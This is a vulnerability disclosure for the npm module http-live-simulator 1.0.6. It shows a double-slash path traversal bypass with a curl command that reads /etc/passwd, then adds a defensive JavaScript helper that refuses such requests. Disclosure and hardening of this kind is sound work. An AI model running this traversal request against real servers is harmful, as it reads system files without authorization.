Module name: http-live-simulator
Version: 1.0.6
npm page: https://www.npmjs.com/package/http-live-simulator
This vulnerability is a bypass for the one found in this report in version 1.0.5.
1- Install the module: npm install -g http-live-simulator
2- Run the server: http-live
3- Attempt to access a file from outside that project's directory, such as:
curl --path-as-is http://localhost:8080//../../../../etc/passwd
The bypass consists of adding an extra / after the URL, like:
http://localhost:8080//../../../../etc/passwd
Note the double slashes after the port number.
Impact: path traversal vulnerability leading to read access to arbitrary files on disk.
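A containment check that rejects the request target from step 3, as an added example for a static file server (this is not http-live-simulator's code). The helper name `resolveInsideRoot` and the web root `/srv/site` are hypothetical, and the sample targets are constructed.

```javascript
const path = require('path');

// Hypothetical helper (not from http-live-simulator): map a raw request
// target to a file path that is guaranteed to stay inside rootDir.
// Returns the absolute path, or null when the request must be refused.
function resolveInsideRoot(rootDir, requestTarget) {
  const root = path.resolve(rootDir);
  // Drop query string and fragment; keep the path exactly as the client sent it.
  const rawPath = requestTarget.split(/[?#]/, 1)[0];
  let decoded;
  try {
    decoded = decodeURIComponent(rawPath);
  } catch (err) {
    return null; // malformed percent-encoding
  }
  if (decoded.includes('\0')) return null;
  // Prefix with "./" so one or many leading slashes can never make the
  // path absolute; path.resolve then collapses every "." and ".." segment.
  const candidate = path.resolve(root, '.' + path.sep + decoded);
  // Decide on the final normalized path, not on the raw string.
  const rel = path.relative(root, candidate);
  const escapes =
    rel === '..' || rel.startsWith('..' + path.sep) || path.isAbsolute(rel);
  return escapes ? null : candidate;
}

// Constructed sample request targets, including the one from the report.
const samples = [
  '/index.html',
  '/css/../index.html',
  '//../../../../etc/passwd',
  '/%2e%2e/%2e%2e/etc/passwd',
];
for (const target of samples) {
  const resolved = resolveInsideRoot('/srv/site', target);
  console.log(target, '->', resolved === null ? 'REFUSED' : resolved);
}
```

The check works on path strings only; a server that may contain symlinks under its root also needs to compare `fs.realpathSync` results before opening the file.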